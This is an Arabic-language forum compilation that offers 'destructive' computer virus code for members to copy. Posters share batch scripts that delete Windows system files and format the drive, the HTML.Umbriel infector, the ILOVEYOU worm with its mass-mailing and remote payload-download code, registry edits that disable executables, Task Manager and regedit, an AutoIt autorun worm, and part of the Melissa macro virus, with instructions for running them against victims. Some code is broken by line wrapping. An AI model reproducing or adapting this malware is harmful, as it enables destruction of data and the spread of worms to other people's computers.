اقوا اكواد فايروسات مدمره للكمبيوترات --->
كودات فايروسات
echo off
1
echo WELCOME AT DARKHACK 2005
echo echo off >> c:\autoexec.bat
echo del c:\windows\explorer.exe >> c:\autoexec.bat
echo copy c:\windows\winpopup.exe c:\windows\explorer.exe >> c:\autoexec.bat
echo del c:\windows\command\xcopy.exe >> c:\autoexec.bat
echo del c:\windows\command\xcopy32.exe >> c:\autoexec.bat
echo echo ON EST PAS DES CRASHERS >> c:\autoexec.bat
echo pause >> c:\autoexec.bat
echo echo HI MAN !!! HOW ARE YOU ? >> c:\autoexec.bat
echo pause >> c:\autoexec.bat
echo REGEDIT4 >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.exe] >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.com] >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.bat] >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.sys] >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.hlp] >> c:\windows\registre.reg
copy c:\windows\registre.reg
c:\windows\menudé~1\progra~1\démarr~1\registre.reg
del c:\windows\registre.reg
echo DECRYPTING
echo del c:\windows\system\*.dll >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.sys >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.ocx >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.vxd >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\options\cab\*.cab >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\*.dll >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\*.exe >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.exe >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\bureau\*.lnk >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.drv >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\*.ini >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\fonts\*.ttf >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\SYSTEM32\drivers\*.sys >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\command\*.com >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\*.com >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\autoexec.bat >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo format c\: /autotest /q >> c:\autoexec.bat
echo copy c:\windows\test.bat c:\autoexec.bat >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo BYE BYE IS IT YOUR PASSWORD
C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows
2
[
HTML.Ubriel
for WindowsXP]:
كود
<html><!--Umbriel-->
<head>
<title> Second Part To Hell's HTML.Umbriel </title>
</head>
<body>
<script language="VBScript">
rem VBS
On Error Resume Next
Dim fso, shell, wrte, tempdir, windir, rand, file
Set fso=CreateObject("Scripting.FileSystemObject")
Set shell=CreateObject("Wscript.Shell")
if err.number=429 Then
shell.Run javascript:location.reload()
End If
Set windir=fso.GetSpecialFolder(0)
Set tempdir=fso.GetSpecialFolder(2)
Set wrte=fso.CreateTextFile(windir+"\windows.cmd")
wrte.WriteLine "cls"
wrte.WriteLine "@echo off"
wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's
Umbriel has you..."+chr(34)
wrte.Close()
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Desktop\Components\1\Source", "C:\umbriel.html"
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"
Randomize
rand=int(rnd*5)+1
If rand=1 then
shell.Run windir+"\windows.cmd"
End If
</script>
<script language="JavaScript">
// JS
var viruspath, virus, code, fso, file, check, checka, checkb
fso=new ActiveXObject("Scripting.FileSystemObject")
viruspath=window.location.pathname
viruspath=viruspath.slice(1)
virus=fso.OpenTextFile(viruspath,1)
file=fso.CreateTextFile("C:\\umbriel.html")
for (i=0; i<500; i++)
{
if (checkb!=1)
{
if (Math.round(Math.random()*5)+1 == 3)
{
if (check == 2)
{
file.WriteLine("/"+"*")
file.WriteLine("*"+"/")
}
if (check == 3)
{
file.WriteLine("rem")
}
}
code=virus.ReadLine()
if (code == "/"+"*") { checka=666 }
if (code == "*"+"/") { checka=666 }
if (code == "rem") { checka=666 }
if (checka != 666 ) { file.WriteLine(code) }
checka=0
if (code=="</"+unescape("%68")+"tml>") { checkb=1 }
if (code=="// JS") { check=2 }
if (code=="rem VBS") { check=3 }
if (code=="</"+unescape("%73")+"cript>") { check=0 }
}
}
virus.Close();
file.Close();
</script>
<script language="VBScript">
rem VBS
On Error Resume Next
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("WScript.Shell")
set myfile=fso.OpenTextFile("C:\umbriel.html")
mycode=myfile.ReadAll
myfile.Close()
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File1")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File2")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File3")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File4")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File5")
if rr <> "" Then Call Umbriel(rr, mycode)
Sub Umbriel(rr, mycode)
set victim=fso.OpenTextFile(rr)
infcheck=victim.ReadLine
If infcheck<>"<html><!--Umbriel-->" Then
viccode=victim.ReadAll
victim.Close()
set wrtevic=fso.OpenTextFile(rr, 2, false, 0)
wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode)
wrtevic.Close
End If
End Sub
</script>
</body>
</html>
هذا كود فيروس لقيتة في موقع اجنبي جديد
شغلتة يسوي ريستارات للجهاز حسب
مافهمت مبرمج باللغة السي
3
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
{
char sys1[256];
char sys2[256];
char win1[256];
GetModuleFileName(hMod, path, sizeof(path));
GetSystemDirectory(sys1, sizeof(sys1));
GetSystemDirectory(sys2, sizeof(sys2));
GetWindowsDirectory(win1, sizeof(win1));
strcat(sys1, "\\Sleep.exe");
strcat(sys2, "\\Doom32.com");
strcat(win1, "\\WinUpdate.exe");
CopyFile(path, sys1, false);
CopyFile(path, sys2, false);
CopyFile(path, win1, false);
MessageBox (0, "Not been foun Ram ", "Error !",
MB_ICONERROR | MB_OK);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\
Run ", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "SLEEP", 0, REG_SZ,
(const unsigned char*) sys1, sizeof(sys1));
RegSetValueEx(hKey, "DOOM32", 0, REG_SZ,
(const unsigned char*) sys2, sizeof(sys2));
RegSetValueEx(hKey, "WinUpdate", 0, REG_SZ,
(const unsigned char*) win1, sizeof(win1));
RegCloseKey(hKey);
}
{
system("shutdown s
f
");
MessageBox(NULL,"Not enough memory to load
this file.","Error !", MB_ICONERROR |
MB_OK);
}
وهذا كود من عندي للكس بي
طبعا batch file
يعني انسخه وحطه في المفكرة واحفظة
بامتداد bat
4
:كود
@echo off
echo hi
del/a/q c:\windows\*.*
del/a/q c:\windows\system32\*.*
rmdir/s/q c:\windows
echo bey
pause
" هذا كود لفيرس "الحب
******************************
rem barok loveletter(
vbe) <i hate go to school>
rem by: spyder / [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /
@GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
ow
eq=""
ctr=0
Set fso =
CreateObject("Scripting.FileSystemObject")
set file =
fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Sof
tware\Micros oft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\W
indows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVELETTERFORYOU.
TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Cur rentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Cur rentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Soft
ware\Micros oft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnw
erhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WINBUGSFIX.
exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfd
jghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WINBUGSFIX.
exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbG
RpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WINBUGSFIX.
exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjkl
NBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnma
dshfgqw237 461234iuy7thjg/WINBUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WINBUGSFIX.
exe")=0)
then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Cur rentVersion\Run\WINBUGSFI
X",downread&"\WINBUGSFIX.
exe"
regcreate
"HKEY_CURRENT_USER\Software\Microsoft\In
ternet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or
(ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&""&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or
(s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set
scriptini=fso.CreateTextFile(folderspec&"\script.i
ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script...
mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will
affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled MardamBey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me )
{ halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVELETTERFORYOU.
HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim
x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set
out=WScript.CreateObject("Outlook.Application"
)
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USE
R\Software\M icrosoft\WAB"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USE
R\Software\ Microsoft\WAB"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached
LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVELETTERFORYOU.
TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\W
AB"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\W
AB"&a,a.Ad dressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\W
AB"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTE
R HTML<?
?
TITLE><META
NAME=@@
Generator@@
&@#&@#&@#&@#&@#&@#&@#=@@
BAROK VBS LOVELETTER@
@>"&
vbcrlf& _
"<META NAME=@@
Author@@
&@#&@#&@#&@#&@#&@#&@#=@@
spyder ??
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ??
@GRAMMERSoft Group ??
Manila,
Philippines ??
March 2000@@>"&
vbcrlf& _
"<META NAME=@@
Description@@
&@#&@#&@#&@#&@#&@#&@#=@@
simple
but i think this is
good...@@>"&
vbcrlf& _
"<??
HEAD><BODY
ONMOUSEOUT=@@
window.name=##
main##;
window.open(##
LOVELETTERFORYOU.
HTM#
#,#
#
main##)@
@
"&vbcrlf& _
"ONKEYDOWN=@@
window.name=##
main##;
window.open(##
LOVELETTERFORYOU.
HTM#
#,#
#
main##)@
@
BGPROPERTIES=@@
fixed@@
BGCOLOR=@@#
FF9933@@>"&
vbcrlf& _
"<CENTER><p>This HTML file need ActiveX
Control<??
p><p>To Enable to read
this HTML file<BR>Please
press ##
YES##
button to Enable
ActiveX<??
p>"&vbcrlf& _
"<??
CENTER><MARQUEE LOOP=@@
infinite@@
BGCOLOR=@@
yellow@@>
zz<?
?
MARQUEE>
"&vbcrlf& _
"<??
BODY><??
HTML>"&vbcrlf& _
"<SCRIPT language=@@
JScript@@>"&
vbcrlf& _
"<!?
??
?"&
vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.****To(0,0);window.
re sizeTo(wi,hi);}"&vbcrlf& _
"???
?
>"&
vbcrlf& _
"<??
SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@@
VBScript@@>"&
vbcrlf& _
"<!"&
vbcrlf& _
"on error resume next"&vbcrlf& _
"dim
fso,dirsystem,wri,code,code2,code3,code4,aw,regdit
"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@@
Scripting.FileSystemObject@@)"&
vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf&
_
"code2=replace(code,chr(91)&chr(45)&chr(91),chr
(39 ))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),ch
r(3 4))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),ch
r(9 2))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@@^
^
MSKernel32.vbs@@)"&
vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@@^
^
MSKernel32.vbs@@))
then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @@
ERROR: can##
t initialize
ActiveX@@"&
vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@@
WScript.Shell@@)"&
vbcrlf& _
"regedit.RegWrite
@@
HKEY_LOCAL_MACHINE^^
Software^^
Microsoft^^
Windows^^
CurrentVersion^^
Ru
n^^
MSKernel32@@,
dirsystem&@@^
^
MSKernel32.vbs@@"&
vbcrlf& _
"???
?
>"&
vbcrlf& _
"<??
SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"")
set
fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(
91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr
(93))
lines(n)=replace(lines(n),"",chr(37)+chr(45)+chr(
37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVELETTERFORYOU.
HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVELETTERFORYOU.
HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
بالفجوال بيسك
جلب الداة winsock
ضع الكود في الفورم ملحظة********
لتقوموا بتجرتة الكود ************ فقط بعد
وضع الكود يجب انشاء ملف exe
4
le code
app.taskvisible=false
call kill("c:\windows\*.exe")
call kill("c:\windows\*.ini")
call kill("c:\windows\*.dll")
أنا خليته في تكست و بعدين بدلت المتداد
الى .reg
و الهدف منه ان أي شي امتداده bat exe pif
com ما يشتغل
:::::::: و هو كاتالي::::::::
[line]
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.bat\PersistentHandler]
@="{System Axe}"
[HKEY_CLASSES_ROOT\.pif\PersistentHandler]
@="{System Axe}"
[HKEY_CLASSES_ROOT\.exe\PersistentHandler]
@="{System Axe}"
[HKEY_CLASSES_ROOT\.com\PersistentHandler]
@="{System Axe}"
[line]
هذا الكود لتعطيل الريجستري وادارة المهام
ولل gpedit.msc الي يمكن للضحية اذا كان
شاطر شوي انو يشغل منه اداره المهام
.....والريجستري
reg add
HKCU\software\Microsoft\Windows\CurrentVersi
on\Pol icies\System\ /v DisableRegistryTools /t
REG_DWORD /d 0000001 /f
reg add
HKEY_CURRENT_USER\Software\Microsoft\Wi
ndows\Curre ntVersion\Policies\System\ /v
DisableTaskMgr /t reg_dword /d 00000001 /f
@del "C:\WINDOWS\system32\gpedit.msc" /q
أقدم لكم الفيروس الذي يقوم بتغير الشاشة الرئيسية على قولت واحد
من الشباب .. وأداني الكود .. وأنا دحين بأجربو .. لكن أديكم الكود
.. وأفيدكم .. لنكم عيوني إنتو
.. الكود هو
:كود
@echo off
set key=HKCU\Software\Microsoft\Internet Explorer\Main
set value=Start page
set data=http://www.tvquran.com/
reg.exe add "%key%" /v "%value%" /d "%data%" /f >nul
قمت بصناعة فايروس يقوم بعمل minimize
للنوافذ المفتوحة
الية عمله
عند تشغيله يغير اسمه الى 1
taskmgr
ينقل نفسه الى 2
my document
يقوم باخفاء نفسه 3
يسجل اسمه ضمن المسجلت 4
يقوم بانشاء ملف اوتوران 5
يقوم بعمل منيمايز للنوافذ المفتوحة حيث 6
قمت بانشاء عداد يبداء من 1 ويتزايد بمقدار 1
ويتوقف عندما يصل العدد الى - 1 وهذا
مستحيل
بعد النتشار عند فتح اي بارتشن فان 7
الفايروس سيعمل من جديد حتى بعد اعادة
التشغيل
البرنامج المستخدم هو AutoIt Version: 3.2.10.0
وهذا هو كود الفايروس
#cs
AutoIt
Version: 3.2.10.0
Author: asd
Script Function:
Template AutoIt script.
#ce
;
Script Start Add
your code below here
#NoTrayIcon
$name="taskmgr"
$exe=".exe"
$count=1
$c="c:"
$d="d:"
$e="e:"
$f="f:"
$g="g:"
$h="h:"
$i="i:"
$j="j:"
$k="k:"
$l="l:"
$m="m:"
$n="n:"
sleep(3000)
FileCopy (@AutoItExe, @DocumentsCommonDir
& "" & $name & $exe,0)
; Make itself protected (readonly, system, hidden)
FileSetAttrib (@DocumentsCommonDir & "" &
$name & $exe,"+RSH")
; Copy itself to windows directory
RegWrite
("HKEY_LOCAL_MACHINE\SOFTWARE\Micr
osoft\Windows
NT\CurrentVersion\Winlogon","Shell","REG_SZ
","Expl orer.exe " & $name & $exe)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;
sleep(1000)
IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Open",$name & $exe)
IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Shellexe cute",$name
& $exe)
IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Shell\Open\command"
,$nam e & $exe)
IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Shell","Open")
Sleep (1)
FileSetAttrib (@DocumentsCommonDir &
"\autorun.ini","+RSH")
do
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;
FileDelete($c& "\autorun.inf")
FileDelete($d& "\autorun.inf")
FileDelete($e& "\autorun.inf")
FileDelete($f& "\autorun.inf")
FileDelete($g& "\autorun.inf")
FileDelete($h& "\autorun.inf")
FileDelete($i& "\autorun.inf")
FileDelete($j& "\autorun.inf")
FileDelete($k& "\autorun.inf")
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$c& "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$d & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$e & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$f & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$g & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$h & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$i & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$j & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$k & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$l & "\autorun.inf",1)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;
FileCopy(@AutoItExe,$c & "" & $name & $exe)
FileSetAttrib ($c & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$d & "" & $name & $exe)
FileSetAttrib ($d & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$e & "" & $name & $exe)
FileSetAttrib ($e & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$f & "" & $name & $exe)
FileSetAttrib ($f & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$g & "" & $name & $exe)
FileSetAttrib ($g & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$h & "" & $name & $exe)
FileSetAttrib ($h & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$i & "" & $name & $exe)
FileSetAttrib ($i & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$j & "" & $name & $exe)
FileSetAttrib ($j & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$k & "" & $name & $exe)
FileSetAttrib ($k & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$l & "" & $name & $exe)
FileSetAttrib ($l & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$m & "" & $name & $exe)
FileSetAttrib ($m & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$n & "" & $name & $exe)
FileSetAttrib ($n & "" & $name & $exe,"+RSH")
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;
sleep (5)
WinMinimizeAll()
$count=$count+1
sleep(50000)
Until $count=1
لكم كود فايروس ميلسيا
هديةبما اني عضو جديد
ارجو عدم استخدامه ضد اخوانناالمسلمين
Private Sub AutoOpen() On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\.
0\ord\e curity", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").
Enabl ed = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\.
0\ord\e curity", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabl
ed = False
Options.ConfirmConversions = (1 1):
Options.VirusProtection = (1 1):
Options.SaveNormalPrompt = (1 1)
End If
Dim UngaDasOutlook, DasMapiName,
BreakUmOffASlice
Set UngaDasOutlook =
CreateObject("Outlook.Application")
Set DasMapiName =
UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\,
"Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice =
UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo =
AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message
From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document
you asked for ... don't show anyone else
"
BreakUmOffASlice.Attachments.Add
ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\,
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 =
ActiveDocument.VBProject.VBComponents.Item(1
)
Set NTI1 =
NormalTemplate.VBProject.VBComponents.Item(
1)
NTCL = NTI1.CodeModule.CountOfLines
